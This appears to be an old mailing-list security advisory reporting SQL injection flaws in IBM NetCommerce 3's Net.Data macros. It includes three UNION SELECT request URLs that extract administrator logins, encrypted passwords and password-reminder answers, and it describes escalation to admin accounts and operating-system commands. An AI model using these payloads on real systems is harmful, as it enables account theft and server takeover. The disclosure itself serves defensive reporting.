hola friends,

while i was participating on the openhack contest
i found a couple of serious security-holes within ibm s
so called "netcommerce" thing which seems to be a mixture of
websphere, net.data, servlets, jsp s and db2?

however..summary:

class: input validation error
remote: yes
local: yes
vulnerable: ibm netcommerce 3???


description:


besides well known websphere-bugs (file thru disclosure and default-admin
passwords) ...

the most dangerous bugs result from NON-existing input validation within
netcommerc s net.data "macros".

by crafting malformed http-requests it is possible to extract "any"
netcommerce-database-information.

combining this method with other default-"netcommerce" funcionality
(PasswordReset for example) it is possible to take hold of so called
"store-" or "site-manager"-accounts.

once youre an nc-administrator you are allowed to use all the admin-tools.

at this point youre able to up- and download files, issue op-system-commands
or do any query with the very very high-privileged DB2INST1 account.

this can lead to a possible take-over of the whole system....


many "default-macros" are vulnerable to this (classic:-) sort of attack.

exploit:


a few examples:

1) "HowTo find Administrator Accounts"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

2) "Passwords(crypted)"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

3) "Password-Reminders"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

of course "orderdspc.d2w" is not the only vulnerable macro .. it s just an
example. casting between different data-types is possible (read the db2-man
pages).

also it should(not proofed) be possible to query other databases.


vendor status:

this mail was sent to "[EMAIL PROTECTED]" last week.
(ers = emergency response team)


nice day,


rc


[EMAIL PROTECTED]
[EMAIL PROTECTED]


<FLAME> due to the very unprofessional(or should i say unfair) system-setup
of the openhack-servers i was not able to proof the whole concept </FLAME>

_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Reply via email to